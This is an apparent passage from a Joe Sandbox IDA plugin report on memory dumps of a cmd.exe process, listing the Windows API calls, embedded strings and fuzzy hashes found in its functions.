                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ECF7
                                                                                                                                              • Part of subcall function 0024EC2E: _wcsicmp.MSVCRT ref: 0024ED0D
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 002501DB
                                                                                                                                            • exit.MSVCRT ref: 0025E621
                                                                                                                                            • _wcsupr.MSVCRT ref: 0025E683
                                                                                                                                            • _wcsicmp.MSVCRT ref: 0025E71A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                                                                            • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                            • API String ID: 2336066422-4197029667
                                                                                                                                            • Opcode ID: 9966c913933ba07ead4751e5a19db6fd5451a2c7b0053c62c538f218dde14b1e
                                                                                                                                            • Instruction ID: 6f5c739fc34bf6613c2fbbab997b65bd1ae0c45e79785184a859a236ac7969c4
                                                                                                                                            • Opcode Fuzzy Hash: 9966c913933ba07ead4751e5a19db6fd5451a2c7b0053c62c538f218dde14b1e
                                                                                                                                            • Instruction Fuzzy Hash: 90513834B302168BDF1CDF61CC956BE7329EF60345F054469EC06A7180EF709E698B9A
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memsetwcschr$_wcsicmpiswspace
                                                                                                                                            • String ID: :.\$=,;$=,;+/[] "
                                                                                                                                            • API String ID: 1913572127-843887632
                                                                                                                                            • Opcode ID: 0522078d686bdada0d15421e6b8319c959460752a82c795f38da1a2dedba0850
                                                                                                                                            • Instruction ID: 156797661c5e16b09b2df81be1d4c71dc696a01f5bf164a40e9d68128bc4fe33
                                                                                                                                            • Opcode Fuzzy Hash: 0522078d686bdada0d15421e6b8319c959460752a82c795f38da1a2dedba0850
                                                                                                                                            • Instruction Fuzzy Hash: C7A10631A352269BEF38CF68D888BB977B0FF44314F160199E806A7291D7B09DA5CB51
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                                                                                            • String ID: +-~!$/%$/%
                                                                                                                                            • API String ID: 2191331888-2839661920
                                                                                                                                            • Opcode ID: 59c8d4086dac9a807fadb12f746fa5fd629a57e125073e4e30e386dd8b059e78
                                                                                                                                            • Instruction ID: 1e51586a3313cd66e85d1b43e5f4b7b75c8ef5a54614f3ef8c97c3435e400f50
                                                                                                                                            • Opcode Fuzzy Hash: 59c8d4086dac9a807fadb12f746fa5fd629a57e125073e4e30e386dd8b059e78
                                                                                                                                            • Instruction Fuzzy Hash: 4851A17142060ADBCB04DF24E9499EA37A9EF05362B10C026FC169B150EBB4DF28DB65
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcschr$iswspace
                                                                                                                                            • String ID: =,;
                                                                                                                                            • API String ID: 3458554142-1539845467
                                                                                                                                            • Opcode ID: 60c12897166f3530f6b64c91cfa730de2be0fb4faa5822544aa4e2989c821afe
                                                                                                                                            • Instruction ID: 0f30b1b9b7bfd13eb568fec37f2cbb3d94215c22c56307e34aa7e579daa659f5
                                                                                                                                            • Opcode Fuzzy Hash: 60c12897166f3530f6b64c91cfa730de2be0fb4faa5822544aa4e2989c821afe
                                                                                                                                            • Instruction Fuzzy Hash: 9F81E074A20216CBDF399F64CC453BA73B5AF54305F1448ABED4AA7240EB74CDA8CB61
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            • Opcode ID: 065fcb9e9535a74f066e8058601d916f00b0b1568b66f88d574d7ec3503413b8
                                                                                                                                            • Instruction ID: 6a93ab08608927ded336c88acd6b90c937144b377da91b11c23558c35fce1fff
                                                                                                                                            • Opcode Fuzzy Hash: 065fcb9e9535a74f066e8058601d916f00b0b1568b66f88d574d7ec3503413b8
                                                                                                                                            • Instruction Fuzzy Hash: 80512DBAA00556BFDB20DF5C898097EFBB8FB09200B14856AE465DB641D374DF10E7E0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                             • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
APIs
• Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,0026CA98,0000000C), ref: 00256940
• _amsg_exit.MSVCRT ref: 00256955
• _initterm.MSVCRT ref: 002569A9
• __IsNonwritableInCurrentImage.LIBCMT ref: 002569D5
• exit.MSVCRT ref: 00256A1C
• _XcptFilter.MSVCRT ref: 00256A2E
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
• String ID: $&$$&
• API String ID: 796493780-2255267958
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00263877), ref: 00262D31
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: ObjectSingleWait
• String ID: wil
• API String ID: 24740636-1589926490
APIs
• MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,0027A7F0,00000000,?,00000200), ref: 0024C818
• wcschr.MSVCRT ref: 0024C882
• _get_osfhandle.MSVCRT ref: 0024C8BA
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0024C8C4
• _get_osfhandle.MSVCRT ref: 0024C8DB
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0024C8ED
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 0024C90D
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04), ref: 0024C91E
• ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0027A7F0,00000200,00000000,00000000), ref: 0024C934
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00288E04), ref: 0024C941
• _get_osfhandle.MSVCRT ref: 0024CAC4
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0024CACE
• memcmp.MSVCRT(0027A7F0,002434F8,00000003), ref: 0025D16E
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
• String ID:
• API String ID: 1383533039-0
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: _wcsicmp
• String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
• API String ID: 2081463915-1668778490
Strings
• ExecuteOptions, xrefs: 03C446A0
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03C44742
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03C44725
• CLIENT(ntdll): Processing section info %ws..., xrefs: 03C44787
• Execute=1, xrefs: 03C44713
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03C44655
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03C446FC
Memory Dump Source
• Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
• Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 0026650F
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0026CD00), ref: 00266545
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 00266553
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 00266590
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 002665AD
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,002420B8,?,00000000,02000000,?,?,?,00000000,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 002665D4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0026CD00,00000018,?,?,0025BFD6), ref: 002665EF
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s
• API String ID: 1019019434-1087296587
APIs
• LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00266069
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 0026607E
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 002660DC
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00266128
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 0026614F
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00266186
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                            • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                            • API String ID: 1580871199-2613899276
                                                                                                                                            • Opcode ID: 8ac0a8a435ea136a48fccad4aaa23fc234b3fbbd2b0aed010b7e66888af6f055
                                                                                                                                            • Instruction ID: bb272210dd8a60ccae62ebf460b731613507fec6672b94f66b5f896d26ad4000
                                                                                                                                            • Opcode Fuzzy Hash: 8ac0a8a435ea136a48fccad4aaa23fc234b3fbbd2b0aed010b7e66888af6f055
                                                                                                                                            • Instruction Fuzzy Hash: 4141A6B4A11219ABEB209B24DC8DF7F767CEB01744F0041A9E609E3281DB709E85CF65
APIs
• _wcsicmp.MSVCRT ref: 002565A4
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 002565D7
• _open_osfhandle.MSVCRT ref: 002565EB
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00262092
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
• API String ID: 689241570-4257191772
• Opcode ID: ab53ebb8d7c10e19263778ffb3484e7a9b996ef88428acebecc85377a92b1c03
• Instruction ID: 200b8483f8b2b95279f3c70db59fa6af85c720673b78d5437654417045df12f4
• Opcode Fuzzy Hash: ab53ebb8d7c10e19263778ffb3484e7a9b996ef88428acebecc85377a92b1c03
• Instruction Fuzzy Hash: 2E317C72A60201AFE7244FA8AC4DB6F77A9E750371F70422AE812E31C0EF708C18C755
APIs
• memset.MSVCRT ref: 00248060
  • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 002481BE
  • Part of subcall function 0024DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0024ACD8,00000001,?,00000000,00248C23,-00000105,0026C9B0,00000240,00251E92,00000000,00000000,0025ACE0,00000000), ref: 0024DCE1
  • Part of subcall function 0024DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0024ACD8,00000001,?,00000000,00248C23,-00000105,0026C9B0,00000240,00251E92,00000000,00000000,0025ACE0,00000000,00000000), ref: 0024DCE8
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 0024818C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00248197
• longjmp.MSVCRT(00280A30,00000001,-00000001,00000000,?,00000000), ref: 0025B09E
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00267FC9,?,002699AE,00000000,?,00000000,0025CF94,00000000,?), ref: 0025B0AB
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00267FC9,?,002699AE,00000000,?,00000000,0025CF94,00000000,?), ref: 0025B0C1
• fprintf.MSVCRT ref: 0025B0D5
• fflush.MSVCRT ref: 0025B0E3
  • Part of subcall function 00248F21: _wcsicmp.MSVCRT ref: 00248FCD
  • Part of subcall function 00248F21: _wcsicmp.MSVCRT ref: 00248FE3
  • Part of subcall function 00248F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00249002
  • Part of subcall function 00248F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00249013
  • Part of subcall function 00248E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00288BF0,00000000,?), ref: 00248EC3
  • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D3A
  • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D44
  • Part of subcall function 00251CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D57
  • Part of subcall function 00251CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00251D61
  • Part of subcall function 002501F5: wcsrchr.MSVCRT ref: 002501FB
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
• String ID:
• API String ID: 3753564779-0
• Opcode ID: 267ffbabc4f62f24659f7813e9af80915328df0784c353620c492666f31fc045
• Instruction ID: f48532384f7673d2ae6c474aa11e207878deded2f7531a4a6a6e92026f95e267
• Opcode Fuzzy Hash: 267ffbabc4f62f24659f7813e9af80915328df0784c353620c492666f31fc045
• Instruction Fuzzy Hash: 4B51F331A302129BDB289FB4EC9AA7F77B4EF04311F14041AE90ED7291EF7489A5CB55
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: memset
• String ID: %s
• API String ID: 2221118986-3043279178
• Opcode ID: 1ad5b87cb6ab84c67a64c9469a8369b178e153d4413e13defcc636bcebcfe358
• Instruction ID: f326f2a88f01a0b4aaee869028f136b287b6baa6bf0b8ed4af4d73c917f78e7a
• Opcode Fuzzy Hash: 1ad5b87cb6ab84c67a64c9469a8369b178e153d4413e13defcc636bcebcfe358
• Instruction Fuzzy Hash: 6691D4716283429BD734DF10D845BABB3E4BF84346F00092DFD8987180EB74EA68CB5A
APIs
• memset.MSVCRT ref: 00253D30
  • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00253E3D
• ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00253E88
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: memset$FullNamePath
• String ID:
• API String ID: 3158150540-0
• Opcode ID: aaec6d7ec637f1f746a8d2ec537d14e9f4d494d2851c5c6ff79b0e6472a39c9a
• Instruction ID: 92d1a163656a25472a0060eca3e6355cf7b9196f5d06b36ad34a8c8f3add7b68
• Opcode Fuzzy Hash: aaec6d7ec637f1f746a8d2ec537d14e9f4d494d2851c5c6ff79b0e6472a39c9a
• Instruction Fuzzy Hash: F002F434A211168BCB24DF68DD997B9B3B1FF48315F1881E9DC0A97250D734AE96CF48
APIs
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,7AF70A41,00000001,?), ref: 0024ADB6
  • Part of subcall function 00255A2E: memset.MSVCRT ref: 00255A5A
  • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
• towupper.MSVCRT ref: 0024B0E3
  • Part of subcall function 0024E950: memset.MSVCRT ref: 0024E9A0
  • Part of subcall function 0024E950: wcschr.MSVCRT ref: 0024E9FC
  • Part of subcall function 0024E950: wcschr.MSVCRT ref: 0024EA14
  • Part of subcall function 0024E950: _wcsicmp.MSVCRT ref: 0024EA80
• wcschr.MSVCRT ref: 0024AED2
• wcsncmp.MSVCRT ref: 0024B016
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BCA7
  • Part of subcall function 0024BC30: iswspace.MSVCRT ref: 0024BD1D
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD39
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD5D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 0025CC6C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0025CCCB
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
• API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
• String ID:
• API String ID: 4198873954-0
• Opcode ID: 2c7ba49b9465b62075d9ebdb1d7b14c601f2b3fbd8a76a89ecdf854553d3bf82
• Instruction ID: 399df9e39f425caaaa20555254f0ce297850e71578017da665fd7cdf7ce8ba22
• Opcode Fuzzy Hash: 2c7ba49b9465b62075d9ebdb1d7b14c601f2b3fbd8a76a89ecdf854553d3bf82
• Instruction Fuzzy Hash: 79B14A71A302128BCB2CAF28CC9977A7364EF40302F154069DD1E976D1EB719DB9CB96
APIs
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BCA7
  • Part of subcall function 0024BC30: iswspace.MSVCRT ref: 0024BD1D
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD39
  • Part of subcall function 0024BC30: wcschr.MSVCRT ref: 0024BD5D
• _wcsicmp.MSVCRT ref: 002675AC
• _wcsicmp.MSVCRT ref: 002675CB
• _wcsicmp.MSVCRT ref: 002675F1
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_240000_cmd.jbxd
Similarity
